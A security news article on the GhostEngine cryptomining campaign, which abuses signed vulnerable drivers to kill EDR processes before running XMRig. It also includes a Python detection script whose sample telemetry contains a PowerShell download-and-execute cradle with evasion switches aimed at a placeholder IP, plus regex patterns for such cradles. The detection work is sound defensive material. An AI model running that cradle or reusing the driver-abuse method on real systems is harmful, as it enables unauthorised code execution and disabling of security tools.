GhostEngine: How Hackers Mine Cryptocurrency Using Avast Drivers

Security researchers at Elastic Security Labs and Antiy have documented a cryptocurrency-mining intrusion set tracked as REF4578. Its malware, GhostEngine, abuses known-vulnerable drivers to shut down security products on the host and then launches the XMRig Monero miner.

Both teams describe the attack as unusually elaborate for a cryptomining operation and have published detection rules so defenders can spot and stop it. Neither report attributes the activity to a known threat group or describes the victims, so the campaign's origin and scale remain unclear.

How GhostEngine Operates

The initial access vector is not known. Observed activity begins with the execution of Tiworker.exe, a file that borrows the name of the legitimate Windows Modules Installer Worker binary (the real TiWorker.exe ships in the WinSxS servicing store). This executable is the first stage of the GhostEngine deployment: it pulls down a PowerShell loader, which in turn fetches the remaining modules onto the infected host.

Specifically, Tiworker.exe downloads a PowerShell script named get.png from the command-and-control (C2) server; this script is GhostEngine's primary loader. It retrieves the other modules and their configuration, disables Windows Defender, enables remote services, and clears several Windows event logs.

The script checks for at least 10 MB of free disk space before continuing and creates scheduled tasks for persistence. It then downloads and executes smartsscreen.exe, GhostEngine's main payload, which terminates EDR agents, removes their binaries and launches XMRig.

To disable security software, GhostEngine drops two legitimately signed but vulnerable drivers, a bring-your-own-vulnerable-driver (BYOVD) technique: aswArPots.sys (an Avast anti-rootkit driver) is used to terminate EDR processes, and IObitUnlockers.sys (an IObit driver) to delete the corresponding executables.


Defense Measures Against GhostEngine

Elastic recommends that defenders watch for suspicious PowerShell execution, unusual process activity and network connections to cryptocurrency mining pools. Loading of known-vulnerable drivers and creation of the kernel services that register them should likewise be treated as red flags.

A preventive control is to block the creation of the vulnerable driver files themselves (aswArPots.sys and IObitUnlockers.sys) on endpoints, so the BYOVD stage cannot proceed. Elastic's report also includes YARA rules for identifying GhostEngine components.
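To make the detection guidance above concrete, here is an added example (my own code, not Elastic's or Antiy's published rules) that replays constructed Windows telemetry resembling the chain described in the previous section and flags each stage: a Tiworker.exe running outside WinSxS, a PowerShell download cradle with evasion switches, cleared event logs, scheduled-task creation, the vulnerable driver being dropped, registered as a kernel service and loaded, and a connection to a mining-pool port. The event field names, the mining-pool port list, the file paths and the task name in the sample are assumptions for illustration; real deployments would map the rules onto their SIEM's schema and a maintained pool list.

```python
import re
from collections import defaultdict

# Vulnerable drivers named in the Elastic and Antiy reports (lower-cased basenames).
VULNERABLE_DRIVERS = {"aswarpots.sys", "iobitunlockers.sys"}

# Ports commonly used by Monero mining pools. ASSUMPTION for illustration only;
# production detection should use a maintained pool host/port list.
MINING_POOL_PORTS = {3333, 4444, 5555, 7777, 14444, 45700}

# The legitimate TiWorker.exe lives under the WinSxS servicing store; anywhere else is suspect.
LEGIT_TIWORKER_DIR = "\\winsxs\\"

# PowerShell download cradles and the evasion switches that usually accompany them.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Invoke-Expression|\biex\b",
    re.IGNORECASE,
)
EVASION_RE = re.compile(
    r"-(?:ep|ExecutionPolicy)\s+bypass|-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)?\s",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased final path component, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Run one rule per GhostEngine stage over event dicts; return {rule_name: [events]}."""
    hits = defaultdict(list)
    for ev in events:
        ch, eid = ev.get("channel"), ev.get("event_id")
        image = ev.get("image", "")
        if ch == "Sysmon" and eid == 1:  # process creation
            cmd = ev.get("command_line", "")
            if basename(image) == "tiworker.exe" and LEGIT_TIWORKER_DIR not in image.lower():
                hits["tiworker_masquerade"].append(ev)
            if basename(image) == "powershell.exe" and CRADLE_RE.search(cmd) and EVASION_RE.search(cmd):
                hits["suspicious_powershell"].append(ev)
        elif ch == "Sysmon" and eid == 11:  # file creation
            if basename(ev.get("target_filename", "")) in VULNERABLE_DRIVERS:
                hits["vulnerable_driver_dropped"].append(ev)
        elif ch == "System" and eid == 7045:  # service installed
            if basename(ev.get("image_path", "")) in VULNERABLE_DRIVERS:
                hits["vulnerable_driver_service"].append(ev)
        elif ch == "Sysmon" and eid == 6:  # driver loaded
            if basename(ev.get("image_loaded", "")) in VULNERABLE_DRIVERS:
                hits["vulnerable_driver_loaded"].append(ev)
        elif (ch, eid) in {("Security", 1102), ("System", 104)}:  # log cleared
            hits["event_log_cleared"].append(ev)
        elif ch == "Security" and eid == 4698:  # scheduled task created
            hits["scheduled_task_created"].append(ev)
        elif ch == "Sysmon" and eid == 3 and ev.get("dest_port") in MINING_POOL_PORTS:
            hits["mining_pool_connection"].append(ev)
    return dict(hits)


def verdict(hits, threshold=3):
    """True when at least `threshold` distinct stages of the chain were seen on one host."""
    return len(hits) >= threshold


# Constructed sample telemetry (not real logs); 203.0.113.x are documentation addresses.
SAMPLE_EVENTS = [
    {"channel": "Sysmon", "event_id": 1, "image": r"C:\Users\Public\Tiworker.exe",
     "command_line": r"C:\Users\Public\Tiworker.exe"},
    {"channel": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -ep bypass -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://203.0.113.10/get.png')\""},
    {"channel": "Security", "event_id": 1102, "subject": "SYSTEM"},
    {"channel": "Security", "event_id": 4698, "task_name": r"\OneDriveCloudSync"},  # assumed name
    {"channel": "Sysmon", "event_id": 11, "target_filename": r"C:\Windows\Temp\aswArPots.sys"},
    {"channel": "System", "event_id": 7045, "service_name": "aswArPots",
     "image_path": r"C:\Windows\Temp\aswArPots.sys", "service_type": "kernel mode driver"},
    {"channel": "Sysmon", "event_id": 6, "image_loaded": r"C:\Windows\Temp\aswArPots.sys"},
    {"channel": "Sysmon", "event_id": 3, "image": r"C:\Windows\Fonts\smartsscreen.exe",
     "dest_ip": "203.0.113.20", "dest_port": 14444},
    # Benign noise that must not fire.
    {"channel": "Sysmon", "event_id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
    {"channel": "Sysmon", "event_id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "203.0.113.30", "dest_port": 443},
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for rule, evs in found.items():
        print(f"{rule}: {len(evs)} event(s)")
    print("likely GhostEngine:", verdict(found))
```

The stage rules are deliberately independent so a single one firing (a legitimate admin clearing a log, say) does not page anyone; `verdict` only fires once several distinct stages appear on the same host, which is the correlation Elastic's guidance implies. The driver rules key on the file name, which is enough for this campaign but easy to evade by renaming; a hardened version would match on the driver's authenticode hash against a vulnerable-driver blocklist instead.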

Although the researchers found only a small balance on the single XMRig payment ID they examined, each infected host may be configured with its own wallet, so the campaign's total proceeds could be far larger than that one sample suggests.
